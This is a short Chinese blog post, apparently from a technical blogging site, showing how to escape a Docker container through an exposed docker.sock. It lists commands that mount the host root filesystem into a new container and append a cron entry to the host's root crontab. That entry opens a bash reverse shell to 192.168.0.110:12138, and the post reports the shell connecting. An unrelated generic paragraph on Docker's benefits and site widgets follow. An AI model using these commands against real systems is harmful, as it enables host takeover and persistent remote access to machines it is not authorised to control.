关于docker in docker的利用

首先判断是否为docker环境,是否存在docker.sock文件,以及判断docker命令是否能够使用

来打印主机信息
docker -H unix:///host/var/run/docker.sock info
反弹shell的环境下无法进入容器终端,无法使用-it进入容器内部
启动一个新的容器,虚拟机根目录挂载到容器test目录下 
docker -H unix:///host/var/run/docker.sock run -v /:/test ubuntu

在这里插入图片描述

可以直接对容器使用docker exec 指定对容器进行操作
docker exec 259b325 ls /test

在这里插入图片描述

但是在使用echo命令时会报错
docker exec 259b325 echo "* * * * * bash -i >& /dev/tcp/192.168.0.101/12138 0>&1" >> /test/var/spool/cron/root

在这里插入图片描述

解决办法

使用-c 命令  将整条命令通过-c传给sh即可
docker exec 259b325 sh -c 'echo "* * * * * bash -i >& /dev/tcp/192.168.0.110/12138 0>&1" >> /test/var/spool/cron/root'

在这里插入图片描述
查看定时任务发现成功写入并且反弹shell
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Docker是一个开源平台,用于在容器化环境中运行应用程序。它可以将应用程序及其依赖项打包在一个独立的、可移植的容器中,以实现跨平台的部署。 在实践中,Docker可以带来诸多好处。首先,它提供了隔离性,每个容器都是相互隔离的,互不干扰,因此可以在同一主机上运行多个不同的应用程序。这大大简化了部署和管理的复杂性,提高了资源利用率。 其次,Docker还具有轻量级和快速启动的优势。由于容器只包含必要的组件,因此它们比虚拟机更小、更快。同时,容器可以在几秒钟内启动和停止,而不需要像传统的虚拟机那样花费较长的启动时间。 另外,Docker还具有可移植性和可扩展性。容器可以在不同的环境中运行,而不需要对应用程序进行修改。这使得开发人员可以在开发环境、测试环境和生产环境中保持一致。此外,Docker还支持自动化部署和水平扩展,使应用程序可以根据需要快速部署和伸缩。 最后,Docker还提供了丰富的生态系统和工具。例如,它可以与持续集成和持续部署工具集成,实现自动化的构建、测试和部署流程。此外,Docker还有大量的镜像仓库和容器编排工具,使得应用程序的管理变得更加简单和灵活。 总结来说,Docker的实践可以带来隔离性、轻量级、快速启动、可移植性和可扩展性等好处。它不仅可以提高开发和运维效率,还可以极大地简化应用程序的部署和管理过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值